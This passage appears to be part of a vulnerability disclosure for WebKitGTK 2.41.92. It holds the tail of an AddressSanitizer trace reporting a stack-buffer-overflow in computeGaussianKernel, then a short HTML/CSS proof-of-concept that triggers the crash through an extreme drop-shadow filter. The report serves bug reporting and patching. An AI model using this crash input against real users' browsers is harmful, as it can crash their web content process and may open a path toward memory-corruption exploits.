WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14
#20 0x7f4c07912bd1 in decltype(auto) std::__apply_impl<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>, 0ul, 1ul>(WebKit::WebProcess&&, WebKit::WebProcess&&, std::integer_sequence<unsigned long, 0ul, 1ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1854:14
#21 0x7f4c07912bd1 in decltype(auto) std::apply<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess&&, WebKit::WebProcess&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1865:14
#22 0x7f4c07912bd1 in void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:134:5
#23 0x7f4c07912bd1 in void IPC::handleMessage<Messages::WebProcess::CreateWebPage, WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)>(IPC::Connection&, IPC::Decoder&, WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:236:9
#24 0x7f4c07912bd1 in WebKit::WebProcess::didReceiveWebProcessMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/DerivedSources/WebKit/WebProcessMessageReceiver.cpp:122:16
#25 0x7f4c08c93deb in WebKit::WebProcess::didReceiveMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:932:9
#26 0x7f4c0831fee0 in IPC::Connection::dispatchMessage(IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1233:15
#27 0x7f4c083204a5 in IPC::Connection::dispatchMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1281:9
#28 0x7f4c08320cb6 in IPC::Connection::dispatchOneIncomingMessage() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1346:5
#29 0x7f4c0832338f in IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1195:28
#30 0x7f4c0832338f in WTF::Detail::CallableWrapper<IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
#31 0x7f4c0499d4a9 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35
#32 0x7f4c0499d4a9 in WTF::RunLoop::performWork() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:147:9
#33 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:80:42
#34 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:79:43
#35 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
#36 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
#37 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&)
Shadow bytes around the buggy address:
0x0fe9f651cd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe9f651cd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe9f651cd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe9f651cd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe9f651cda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe9f651cdb0: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00[04]f2 f2
0x0fe9f651cdc0: f2 f2 00 f2 f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00
0x0fe9f651cdd0: 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
0x0fe9f651cde0: f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8
0x0fe9f651cdf0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f3 f3 f3 f3 f3 f3
0x0fe9f651ce00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==237950==ABORTING
```
5. Proof-of-Concept
```html
<style>
  .class2 {
    -webkit-filter: blur(0em) drop-shadow(91px 36px 1024em black);
  }
  x48,.class0:read-only {
    border-style: groove outset outset hidden;
  }
  *:nth-child(odd) {
    display: block table;
  }
  style {
    -webkit-animation: keyframes2,keyframes3 0.5s steps(454),ease-out alternate-reverse,normal both;
  }
  @keyframes keyframes3 {
    40% { -webkit-transform: scaleX(43) }
  }
</style>
<a id="x56" ping="x" draggable="true" class="class2" translate="yes" itemtype="AAAAAAAA" charset="UTF-16" contextmenu="foo" slot="foo" webkitdropzone="copy" onfocus="f3()">
<image id="x21" tabindex="-1" preserveAspectRatio="xMaxYMax" buffered-rendering="dynamic" class="class0" paint-order="stroke markers" width="0px" vector-effect="non-scaling-stroke" clip="rect(auto,0px,auto,auto)" transform="rotate(180deg) translate(100%,284em)" x="16%">
```
6. Software Download Link
a. https://webkitgtk.org/